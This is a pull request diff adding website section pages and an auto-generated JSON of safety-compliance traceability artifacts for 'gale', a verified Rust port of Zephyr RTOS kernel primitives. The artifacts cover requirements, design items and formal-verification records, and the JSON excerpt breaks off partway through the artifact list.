### PR TITLE
feat(reports): auto-generate data/{project}/ from compliance bundle

### DIFF
--- a/content/gale/_index.md
+++ b/content/gale/_index.md
@@ -1,0 +1,8 @@
++++
+title = "gale"
+sort_by = "title"
+template = "section.html"
+page_template = "page.html"
++++
+
+Artifacts from the **gale** project, exported by [rivet](https://github.com/pulseengine/rivet).

--- a/content/rivet/_index.md
+++ b/content/rivet/_index.md
@@ -1,0 +1,8 @@
++++
+title = "rivet"
+sort_by = "title"
+template = "section.html"
+page_template = "page.html"
++++
+
+Artifacts from the **rivet** project, exported by [rivet](https://github.com/pulseengine/rivet).

--- a/content/spar/_index.md
+++ b/content/spar/_index.md
@@ -1,0 +1,8 @@
++++
+title = "spar"
+sort_by = "title"
+template = "section.html"
+page_template = "page.html"
++++
+
+Artifacts from the **spar** project, exported by [rivet](https://github.com/pulseengine/rivet).

--- a/data/gale/artifacts.json
+++ b/data/gale/artifacts.json
@@ -1,0 +1,19369 @@
+{
+  "artifacts": [
+    {
+      "description": "Kernel heap allocator model with blocking alloc/realloc, overflow-safe calloc, and free-with-unpend-all. Tracks allocation state and wait queue interactions. Actual sys_heap management, spinlocks, and memory operations stay in C — Gale verifies the allocation state machine, overflow protection, and wake correctness only. No unsafe code.\n",
+      "id": "SWARCH-KH-001",
+      "links": [
+        {
+          "target": "SWREQ-KH-KH01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-KH-KH02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-KH-KH05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-KH-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "architecture"
+      ],
+      "title": "Kernel heap module (gale::kheap)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When initializing a counting semaphore, the initial semaphore value shall be set.\n",
+      "id": "ZEP-SRS-5-5",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Initial semaphore value",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "No arithmetic operation on the item count causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-LI-LI06",
+      "links": [
+        {
+          "target": "SYSREQ-LI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "LI6: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "Preemption is indicated when the candidate thread has strictly higher priority than the current thread, or when preemption is explicitly allowed via swap_ok. Maps to kthread.h:224+.\n",
+      "id": "SWREQ-SC-SC05",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SC-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "preemption",
+        "asil-d"
+      ],
+      "title": "SC5: should_preempt returns true when thread has higher priority",
+      "type": "sw-req"
+    },
+    {
+      "description": "The total allocated bytes never exceed heap capacity. This is the fundamental invariant maintained across all operations.\n",
+      "id": "SWREQ-HP-HP01",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "HP1: allocated_bytes <= capacity (bounds invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Validate alignment (power of 2), size (aligned, positive), guard_size (< size), and base+size (no overflow). C source: kernel/thread.c lines 383-470.\n",
+      "id": "SWDD-SKS-VALIDATE",
+      "links": [
+        {
+          "target": "SWARCH-SKS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SKS-SK01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SKS-SK02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SKS-SK03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SKS-SK04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SKS-SK05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SKS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "validate"
+      ],
+      "title": "StackConfig::validate — setup_thread_stack port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Verus specifications in src/fatal.rs with requires/ensures clauses that formally verify fatal handler properties (FT1-FT4) via SMT solving. Proves from_code validity, classify completeness, is_panic correctness, and recovery action mapping. Executed via: bazel test //:verus_test\n",
+      "id": "FV-FT-001",
+      "links": [
+        {
+          "target": "SWREQ-FT-FT01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FT-FT02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FT-FT03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FT-FT04",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Fatal Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "No arithmetic operation on indices or counts causes integer overflow.  Uses u64 intermediate for index calculations that may exceed u32 range.\n",
+      "id": "SWREQ-MQ-MQ12",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "MQ12: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/kheap.rs covering heap initialization, alloc/aligned_alloc state transitions, calloc overflow rejection, free-with-unpend-all wake behavior, and allocation state machine correctness.\n",
+      "id": "UV-KH-001",
+      "links": [
+        {
+          "target": "SWDD-KH-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-KH-ALLOC",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-KH-CALLOC",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-KH-FREE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Kernel heap unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Every push operation must verify that count < capacity and every pop must verify count > 0 before mutating stack state, ensuring the stack invariant 0 <= count <= capacity holds at all times.  Proven by FV-SK-001 (Verus) and FV-SK-002 (Rocq) against SWREQ-SK-SK01 through SWREQ-SK-SK06.\n",
+      "id": "SC-5",
+      "links": [
+        {
+          "target": "H-5",
+          "type": "prevents"
+        },
+        {
+          "target": "SWREQ-SK-SK01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SK-SK04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SK-SK06",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "stack",
+        "bounds-checking"
+      ],
+      "title": "Stack bounds must be checked before push or pop",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a stack that stores word-sized values in last-in first-out (LIFO) order.\n",
+      "id": "ZEP-SRS-SK-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SK",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-SK-SK01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-SK-SK02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "stack"
+      ],
+      "title": "Zephyr: Stack LIFO Word-Sized Entries",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "A device init ordering model that matches Zephyr's device.c/init.c semantics: init levels, priority ordering, dependency checking, and double-init prevention.\n",
+      "id": "SYSREQ-DI-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "kernel"
+      ],
+      "title": "Device initialization ordering model",
+      "type": "system-req"
+    },
+    {
+      "description": "Push an item to the head. Increment count by 1, return OK.\n",
+      "id": "SWDD-LI-PUT",
+      "links": [
+        {
+          "target": "SWARCH-LI-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-LI-LI02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-LI-LI06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "put"
+      ],
+      "title": "Lifo::put — k_lifo_put port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/stack_proofs.v targeting stack invariant preservation (push/pop bounds, capacity conservation, roundtrip, full-rejects-push, empty-rejects-pop) via theorem proving on the coq_of_rust translation. Independent verification path from Verus. Executed via: bazel test //proofs:stack_proofs_test\n",
+      "id": "FV-SK-002",
+      "links": [
+        {
+          "target": "SWREQ-SK-SK01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK03",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "Stack Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The write admission control function maintains the invariant that non-safety writes are rejected when accepting them would reduce available free space below the configured safety reserve threshold. The reserved capacity is exclusively available for safety-flagged writes.  This invariant holds across all write operations and is preserved through GC.\n",
+      "id": "SWREQ-ZMS-P09",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-005",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "reserved-capacity",
+        "admission-control",
+        "asil-d"
+      ],
+      "title": "P9: Reserved capacity never consumed by non-safety writes",
+      "type": "sw-req"
+    },
+    {
+      "description": "A reentrant mutex that matches the Zephyr k_mutex API semantics: initialization, lock (reentrant), unlock with ownership checks, and priority-ordered wait queue for blocked threads.  Must maintain the owner/lock_count correspondence invariant and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-MUT-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-MUT",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "kernel"
+      ],
+      "title": "Reentrant mutex with ownership tracking",
+      "type": "system-req"
+    },
+    {
+      "description": "Criterion benchmarks in benches/sem_bench.rs covering init, give, take, reset, and wake paths.  Serves as performance regression detection across the full module integration.\n",
+      "id": "IV-SEM-002",
+      "links": [
+        {
+          "target": "SWARCH-SEM-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "benchmark",
+        "swe-5"
+      ],
+      "title": "Benchmark regression tests (criterion)",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Aborting an active timeout removes it and returns 0. Aborting an inactive timeout returns -EINVAL. Maps to timeout.c:147-166.\n",
+      "id": "SWREQ-TO-TO02",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "abort",
+        "asil-d"
+      ],
+      "title": "TO2: abort_timeout returns 0 on success, -EINVAL if inactive",
+      "type": "sw-req"
+    },
+    {
+      "description": "All valid numeric reason codes (0-4) map to a defined FatalReason variant. Invalid codes return None.\n",
+      "id": "SWREQ-FT-FT01",
+      "links": [
+        {
+          "target": "SYSREQ-FT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FT-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fatal",
+        "mapping",
+        "asil-d"
+      ],
+      "title": "FT1: all reason codes map to a valid FatalReason variant",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall preempt the current thread when a higher-priority thread becomes ready, unless the current thread is cooperative or has the preemption lock set.\n",
+      "id": "ZEP-SRS-SC-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SC",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "sched"
+      ],
+      "title": "Zephyr: Preemption Policy",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Kani bounded model checking harnesses in tests/kani_harnesses.rs. Exhaustive exploration of init parameter validation, give/take/reset invariant preservation, give-take roundtrip, and multi-operation sequence invariants within bounded state space.\n",
+      "id": "UV-SEM-003",
+      "links": [
+        {
+          "target": "SWDD-SEM-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-GIVE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-TRY-TAKE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-RESET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "kani",
+        "model-checking",
+        "swe-4"
+      ],
+      "title": "Kani bounded model checking harnesses",
+      "type": "unit-verification"
+    },
+    {
+      "description": "z_reset_time_slice aborts any pending slice timeout, clears the expired flag, and re-arms the timeout only if the thread has a non-zero slice size. Maps to timeslicing.c:75-86.\n",
+      "id": "SWREQ-TS-TS03",
+      "links": [
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "reset",
+        "asil-d"
+      ],
+      "title": "TS3: reset cancels pending timeout and re-arms if eligible",
+      "type": "sw-req"
+    },
+    {
+      "description": "The number of active CPUs is always between 1 (CPU 0 never stops) and max_cpus.\n",
+      "id": "SWREQ-SM-SM01",
+      "links": [
+        {
+          "target": "SYSREQ-SM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SM-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "smp",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "SM1: 0 <= active_cpus <= max_cpus (bounds invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's thread lifecycle management. Contains z_impl_k_thread_create, z_setup_new_thread, z_impl_k_thread_priority_get, z_impl_k_is_preempt_thread, k_thread_abort_cleanup, k_thread_abort_cleanup_check_reuse, plus name management, custom data, and stack safety checks. The Gale port models thread state validation, priority classification, and lifecycle state machine only — actual arch context, stack setup, and userspace verification stays in C.\n",
+      "id": "PROV-TL-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "thread",
+        "lifecycle",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/thread.c — thread lifecycle implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Waiters can only exist when the mutex is locked.  An unlocked mutex always has an empty wait queue.\n",
+      "id": "SWREQ-MUT-M02",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "M2: wait_q non-empty implies mutex is locked (always)",
+      "type": "sw-req"
+    },
+    {
+      "description": "When expire is called, the status counter is incremented by exactly 1.\n",
+      "id": "SWREQ-TM-TM05",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TM-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "expire",
+        "asil-d"
+      ],
+      "title": "TM5: expire increments status by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "All arithmetic (alloc, free, total_size) is overflow-safe via bounds checks or u64 intermediates.\n",
+      "id": "SWREQ-MP-MP06",
+      "links": [
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MP-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "MP6: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a memory slab allocator that manages a pool of equal-size memory blocks, returning a block on allocation and accepting a block on free.\n",
+      "id": "ZEP-SRS-MS-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MS",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mem-slab"
+      ],
+      "title": "Zephyr: Fixed-Size Block Allocation",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "After init, the work item has flags == 0 (idle, not queued, not running, not canceling).\n",
+      "id": "SWREQ-WK-WK01",
+      "links": [
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-WK-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "init",
+        "asil-d"
+      ],
+      "title": "WK1: init produces IDLE state (no flags set)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide k_heap_aligned_alloc for allocating memory with a specified alignment, ensuring the returned pointer satisfies the requested alignment constraint.\n",
+      "id": "ZEP-SRS-KH-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-KH",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "kheap"
+      ],
+      "title": "Zephyr: Aligned Heap Allocation",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement thread lifecycle management including creation, starting, aborting, and joining with proper state tracking.\n",
+      "id": "ZEP-SYRS-TL",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "thread"
+      ],
+      "title": "Zephyr: Thread Lifecycle",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's counting semaphore. Contains z_impl_k_sem_init, z_impl_k_sem_give, z_impl_k_sem_take, z_impl_k_sem_reset, plus userspace wrappers and poll event handling. Lines 45-192 contain the core logic; the rest is userspace verification, poll support, and OBJ_CORE infrastructure not in scope for Gale.\n",
+      "id": "PROV-SEM-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "sem",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/sem.c — counting semaphore implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Block the calling thread and insert into wait queue in priority order.\n",
+      "id": "SWDD-CV-WAIT",
+      "links": [
+        {
+          "target": "SWARCH-CV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-CV-C06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-CV-C08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-CV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "wait",
+        "blocking"
+      ],
+      "title": "CondVar::wait_blocking — z_impl_k_condvar_wait port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "When get is called and count > 0, count decrements by 1 and returns OK. Maps to queue.c:335-370.\n",
+      "id": "SWREQ-QU-QU04",
+      "links": [
+        {
+          "target": "SYSREQ-QU-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-QU-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "get",
+        "asil-d"
+      ],
+      "title": "QU4: get when not empty decrements count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "A kernel failure in a safety-critical execution path causes the vehicle to behave unexpectedly or uncontrollably — a catastrophic outcome at ASIL-D severity.\n",
+      "id": "L-1",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "loss"
+      ],
+      "title": "Loss of vehicle control",
+      "type": "loss"
+    },
+    {
+      "description": "The global lock count is always non-negative. Lock increments, unlock decrements with underflow check.\n",
+      "id": "SWREQ-SM-SM04",
+      "links": [
+        {
+          "target": "SYSREQ-SM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SM-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "smp",
+        "lock",
+        "asil-d"
+      ],
+      "title": "SM4: global lock count is non-negative and bounded",
+      "type": "sw-req"
+    },
+    {
+      "description": "If queue is empty: return Err(ENOMSG). Otherwise return Ok(read_idx) for the caller to copy data, advance read_idx = (read_idx + 1) % max_msgs, and decrement used_msgs.\n",
+      "id": "SWDD-MQ-GET",
+      "links": [
+        {
+          "target": "SWARCH-MQ-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MQ-MQ05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MQ-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "get"
+      ],
+      "title": "MsgQ::get — z_impl_k_msgq_get index advancement",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all futex code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-FX-003",
+      "links": [
+        {
+          "target": "SWREQ-FX-FX01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Futex Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Whenever a higher-priority thread blocks on a mutex, the kernel must temporarily raise the lock-holding thread's effective priority to that of the highest-priority waiter, preventing unbounded priority inversion.  Enforced by SWREQ-MUT-M08 and proven by FV-MUT-001 (Verus) and FV-MUT-002 (Rocq).\n",
+      "id": "SC-2",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "prevents"
+        },
+        {
+          "target": "SWREQ-MUT-M08",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "mutex",
+        "priority-inheritance"
+      ],
+      "title": "Mutex must implement priority inheritance",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Unit tests in src/device_init.rs covering init, init_device (normal, double-init, wrong level), advance_level, check_deps_satisfied, is_device_ready, level enum conversions and roundtrip.\n",
+      "id": "UV-DI-001",
+      "links": [
+        {
+          "target": "SWDD-DI-INIT-DEVICE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "DeviceInit unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Verus specifications in src/mutex.rs with requires/ensures clauses that formally verify all mutex properties (M01-M11) via SMT solving. Proves absence of panics, overflow, and invariant violations. Includes proof lemmas for owner-lock_count correspondence, lock-unlock roundtrip, and reentrant depth tracking. Executed via: bazel test //:verus_test\n",
+      "id": "FV-MUT-001",
+      "links": [
+        {
+          "target": "SWREQ-MUT-M01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M10",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M11",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Mutex Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/ring_buf.rs with requires/ensures clauses that formally verify ring buffer properties (RB1-RB8) via SMT solving. Proves head/tail index safety, put/get modular arithmetic, capacity conservation, and wrap-around correctness. Executed via: bazel test //:verus_test\n",
+      "id": "FV-RB-001",
+      "links": [
+        {
+          "target": "SWREQ-RB-RB01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-RB-RB02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-RB-RB03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-RB-RB04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-RB-RB05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-RB-RB06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-RB-RB07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-RB-RB08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "RingBuf Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Full Zephyr kernel mailbox test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_MBOX=y. Tests exercise the complete k_mbox API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suite: zephyr/tests/kernel/mbox/mbox_api.\n",
+      "id": "SV-MB-001",
+      "links": [
+        {
+          "target": "SYSREQ-MB-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Mailbox Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Full Zephyr kernel memory pool test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_MEMPOOL=y. Tests exercise block allocation, deallocation, conservation invariant, and bounded capacity through the Gale FFI/C shim layer. Test suite: zephyr/tests/kernel/mem_pool.\n",
+      "id": "SV-MP-001",
+      "links": [
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Memory Pool Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Verus specifications in src/thread.rs with requires/ensures clauses that formally verify thread state machine correctness via SMT solving. Proves new() initialization, dispatch/block/wake state transitions preserve identity and priority, valid transition enforcement, and wake return value propagation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-THR-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P07",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Thread Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/zms.rs with requires/ensures clauses that formally verify all 10 ZMS properties (P1-P10) via SMT solving. Proves sector state machine validity, ATE CRC correctness, spare sector invariant, GC data preservation, write O(1) condition, no-stale-data guarantee, full sector detection, entry bounds, wear leveling bounds, and power-fail safety. Executed via: bazel test //:verus_test\n",
+      "id": "FV-ZMS-001",
+      "links": [
+        {
+          "target": "SWREQ-ZMS-P01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-ZMS-P10",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6",
+        "zms"
+      ],
+      "title": "ZMS Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The Zephyr RTOS shall protect cooperative-priority threads from preemption, ensuring they run until they voluntarily yield, block, or terminate.\n",
+      "id": "ZEP-SRS-SC-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SC",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "sched"
+      ],
+      "title": "Zephyr: Cooperative Thread Protection",
+      "type": "stakeholder-req"
+    },
+    {
